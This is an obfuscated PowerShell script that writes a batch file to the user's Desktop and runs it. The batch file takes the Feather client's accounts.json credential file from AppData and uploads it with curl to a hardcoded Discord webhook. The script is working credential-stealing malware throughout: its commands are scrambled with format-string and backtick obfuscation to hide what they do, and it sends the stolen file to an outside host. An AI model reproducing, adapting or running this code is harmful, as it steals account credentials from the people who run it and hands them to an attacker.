&('Sv')  U134Fm  ([TYpE]("{0}{1}{3}{4}{2}"-f 'sysTEm.','enV','MEnT','i','RoN'))  ;
&("{3}{2}{0}{1}"-f'a','ble','i','Set-Var') -Name ("{2}{1}{3}{0}"-f 'Path','e','d','sktop') -Value ( ( .("{0}{2}{1}{3}"-f 'gE','Ia','T-vaR','BlE')  U134fM )."VaL`UE"::("{1}{2}{0}" -f'th','GetFo','lderPa').Invoke(("{0}{1}{2}"-f 'D','eskto','p')))
.("{2}{0}{3}{1}" -f't-Vari','e','Se','abl') -Name ("{0}{2}{3}{1}"-f'ba','ePath','tc','hFil') -Value (.("{0}{2}{1}"-f'Join-P','h','at') ${d`es`ktoPpa`Th} ("{2}{3}{0}{1}"-f 'e','bhook.bat','send_','w'))


.("{3}{1}{2}{0}" -f 'ble','Vari','a','Set-') -Name ("{0}{3}{1}{2}" -f 'b','c','hContent','at') -Value (@"
@echo off
setlocal enabledelayedexpansion

:: Discord Webhook URL
set webhookUrl=https://discord.com/api/webhooks/1378519975391662212/_SR7iWgi88IV3mWrzN3Vq3vLiXJM5VqSlmWBfz9plnUdhfN1WXeLYNmOrmxTwY37XdSc

:: Path to the accounts.json file
set filePath=%USERPROFILE%\AppData\Roaming\.feather\accounts.json

:: Check if the file exists
if not exist "%filePath%" (
    echo File accounts.json does not exist at the specified path.
    exit /b
)

:: Prepare message
set message=Here you go king :pray:

:: Correcting the payload format
set payload={\"content\":\"%message%\"}

:: Escape the payload for the curl request
set payload_json={\"content\":\"%message%\"}

:: Prepare CURL command for sending the request
curl -X POST %webhookUrl% ^
     -H "Content-Type: multipart/form-data" ^
     -F "payload_json=%payload_json%" ^
     -F "file=@%filePath%"

if %errorlevel% neq 0 (
    echo Failed to send the webhook request.
) else (
    echo File sent successfully!
)

endlocal
"@)


.("{3}{1}{0}{2}" -f'ten','Con','t','Set-') -Value ${Ba`TcHC`oN`TEnt} -Path ${baTch`F`iLePA`Th}


&("{2}{1}{0}"-f'ost','e-H','Writ') ('Bat'+'c'+'h '+'fi'+'le '+'create'+'d'+' '+'a'+'t '+"$batchFilePath")


&("{2}{1}{0}" -f'ss','art-Proce','St') -FilePath ${B`AT`ChF`IL`ePATh}
.("{1}{0}{2}"-f '-H','Write','ost') ("{0}{1}{4}{6}{5}{2}{3}"-f'B','atc','w runn','ing...','h f',' no','ile is')
